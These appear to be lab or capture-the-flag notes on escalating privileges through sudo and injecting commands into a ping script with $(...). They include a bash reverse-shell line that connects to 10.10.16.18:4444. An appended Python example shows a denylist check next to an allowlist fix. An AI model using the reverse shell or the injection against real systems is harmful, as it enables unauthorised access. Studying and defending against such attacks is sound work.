sudo -l wins!
sudo nano
/bin/nano /opt/priv
Running a sudo-allowed file as another user:
sudo -u USER SOMETHING -p
It takes our input (assuming it's an IP address) and runs ping on it. To prevent command injection, it checks for these characters:
However, it doesn't check for the dollar sign ($), which can be used to execute commands like this: $(command)
So, for example, if we run ping -c 1 $(echo 127.0.0.1), echo 127.0.0.1 is executed first and then the ping command is executed:
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.18/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
Then run the same script again.
--- we could've also used $(bash)
Now we are pepper!
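Added example (not from the original notes or the target script): the denylist check described above next to an allowlist fix that parses the input as an IP address and runs ping without a shell. The FORBIDDEN list and all function names are assumptions, since the page does not show the script's real character list.

```python
import ipaddress
import subprocess

# Hypothetical denylist: the page does not list the script's real characters.
FORBIDDEN = ["&", ";", "-", "`", "||", "|"]

def denylist_allows(user_input):
    """Filter style described above: reject input containing a listed token."""
    return not any(token in user_input for token in FORBIDDEN)

def vulnerable_command(user_input):
    """String a shell would receive; the shell expands $(...) before ping runs."""
    return "ping -c 1 " + user_input

def safe_ping_argv(user_input):
    """Allowlist: the input must parse as an IP address literal, else refuse."""
    try:
        addr = ipaddress.ip_address(user_input.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % user_input) from None
    # "--" ends option parsing; addr is re-serialized rather than echoed back.
    return ["ping", "-c", "1", "--", str(addr)]

def safe_ping(user_input):
    """Run ping from an argument vector, so no shell ever parses the input."""
    return subprocess.run(safe_ping_argv(user_input), shell=False).returncode

def audit(samples):
    """Return (input, passes_denylist, passes_allowlist) for each sample."""
    rows = []
    for s in samples:
        try:
            safe_ping_argv(s)
            strict = True
        except ValueError:
            strict = False
        rows.append((s, denylist_allows(s), strict))
    return rows

if __name__ == "__main__":
    # Constructed sample inputs.
    samples = ["127.0.0.1", "$(echo 127.0.0.1)", "::1", "127.0.0.1; id"]
    for s, deny_ok, strict_ok in audit(samples):
        print(f"{s!r:24} denylist_passes={deny_ok} allowlist_passes={strict_ok}")
```

The denylist passes the $(...) input because no listed token appears in it; the allowlist rejects it because it is not an address literal.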